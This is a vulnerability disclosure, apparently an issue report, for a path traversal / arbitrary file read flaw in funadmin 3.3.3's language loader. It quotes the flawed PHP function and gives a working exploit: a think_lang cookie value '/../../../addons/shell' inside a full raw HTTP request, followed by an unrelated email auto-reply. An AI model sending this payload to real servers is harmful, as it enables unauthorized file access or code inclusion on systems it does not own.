A Arbitrary File Read Vulnerability exists in funadmin3.3.3

[scofield1920]

Description:
Arbitrary File Read Vulnerability exists in funadmin3.3.3 might allow attackers to read arbitrary files through web applications without being restricted by access control. This vulnerability may lead to sensitive information leakage, system crashes, and other issues. It can also read sensitive file information inside the computer.

Vulnerability Type: Arbitrary File Read Vulnerability

Affected component：app/common/controller/Backend.php

protected function loadlang($name,$app)
    {
        $lang = cookie(config('lang.cookie_var'));
        if(!empty($lang) && Str::contains($lang,'../')){
            return false;
        }
        if($app && $app!=='backend'){
            $res =  Lang::load([
                $this->app->getBasePath() .'backend'. DS . 'lang' . DS . $lang . '.php',
                $this->app->getBasePath() .$app. DS . 'lang' . DS . $lang  . '.php',
                $this->app->getBasePath() .$app. DS . 'lang' . DS . $lang . DS . str_replace('.', DS, $name) . '.php',
            ]);
       }else{
            $res = Lang::load([
                $this->app->getAppPath() . 'lang' . DS . $lang . '.php',
                $this->app->getAppPath() . 'lang' . DS . $lang . DS . str_replace('.', DS, $name) . '.php',
            ]);
        }
        return $res;

    }

Attack Vectors:

replace think_lang=....; with think_lang=/../../../addons/shell;
such as :
Cookie: Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1715700076; think_lang=/../../../addons/shell; PHPSESSID=fe64bf5eac300a03bd3f52830990ae83;

GET / HTTP/1.1
Host: 127.0.0.1:8022
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1715700076; think_lang=/../../../addons/shell; PHPSESSID=fe64bf5eac300a03bd3f52830990ae83; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1715701691
Connection: close

[funadmin]

这是来自QQ邮箱的假期自动回复邮件。   您好，我最近正在休假中，无法亲自回复您的邮件。我将在假期结束后，尽快给您回复。